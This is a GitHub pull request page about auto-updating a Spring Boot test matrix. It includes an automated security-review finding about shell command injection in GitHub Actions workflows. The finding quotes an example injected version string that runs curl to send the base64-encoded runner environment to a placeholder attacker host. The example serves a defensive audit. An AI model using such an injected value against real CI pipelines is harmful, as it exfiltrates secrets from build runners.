Skip to content

Auto update Test Matrix for Spring Boot #4743

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Draft
adinauer wants to merge 17 commits into
base: main
Choose a base branch
from
+1,968 −3

ci: Extract Spring Boot version updater script

8309e2e
Select commit
Loading
Failed to load commit list.
Draft

Auto update Test Matrix for Spring Boot #4743

ci: Extract Spring Boot version updater script
8309e2e
Select commit
Loading
Failed to load commit list.
@sentry/warden / warden completed May 28, 2026 in 8m 25s

1 issue

Medium

PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection - `.github/workflows/spring-boot-4-matrix.yml:24-39`

.github/data/spring-boot-3-versions.json (modifiable in a PR) is read by the load-versions job and passed into the matrix; the Update Spring Boot 3.x version step then expands ${{ matrix.springboot-version }} directly inside a run: block. A crafted value such as 3.4.1"; curl https://attacker/$(env | base64) # becomes injected shell on the runner. Move the value to an env: variable (e.g. SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}) and reference $SPRINGBOOT_VERSION instead. The identical pattern exists in spring-boot-2-matrix.yml and spring-boot-4-matrix.yml.

Also found at:

  • .github/workflows/spring-boot-2-matrix.yml:39
2 skills analyzed
Skill Findings Duration Cost
security-review 1 6m 56s $2.31
check-code-attribution 0 1m 24s $0.77

⏱ 8m 20s · 1.0M in / 71.4k out · $3.08

View more details on @sentry/warden